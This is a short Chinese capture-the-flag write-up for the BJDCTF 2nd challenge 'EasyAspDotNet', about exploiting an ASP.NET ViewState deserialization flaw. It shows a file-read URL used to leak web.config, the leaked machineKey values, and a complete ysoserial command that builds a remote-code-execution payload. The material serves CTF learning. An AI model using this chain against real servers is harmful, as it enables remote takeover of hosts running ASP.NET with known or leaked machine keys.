本文主要是介绍[BJDCTF 2nd]EasyAspDotNet 记录,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一道windows题,赵老板还是厉害。
本篇为自己本人记录不是详情题解
赵老板发的文章
赵老板题解
赵老板文章里的一句话:
打 CTF 的同学也请把眼光放远一些,不要给自己创造舒适区,多接触一些新的东西。
微软的漏洞,产生的原因是每台 Exchange Server 安装完后在某个 Component 中都使用了同一把固定的 Machine Key,可以通过这个KEY篡改 ASP.NET Form 中的 VIEWSTATE 参数数值以进行反序列化攻击,从而达成 Remote Code Execution 控制整台主机服务器。
aspx后缀的页面,通常都有一个配置文件web.config.这题存在任意文件泄露
click后查看源代码,会发现图片的位置所在,复制到url中
http://cdef4387-9ab9-4b9b-a606-6e179e2b62ed.node3.buuoj.cn/ImgLoad.aspx?path=4.gif
注意他的url
发现可以文件包含读取,这样就可以读取web.config文件了,我看了师傅们都是用curl来进行文件读取的,但是我自己试了不行,可以用迅雷下载
下载出来
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<machineKey validationKey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" decryptionKey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5" validation="SHA1" decryption="3DES" />
</system.web>
</configuration>
接下来要用到工具ysoserial,赵老板的题解已提供下载链接
根据那篇文章,得出这个工具的使用方法
看到参数,可以发现缺少ExploitClass.cs
短文已给出相关payload:
直接复制就好
最后的payload:
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9"
用postman进行传参就好
cmd指令:(与linux指令不一样)
dir 列出当前目录
type 查看当前文件
这篇关于[BJDCTF 2nd]EasyAspDotNet 记录的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!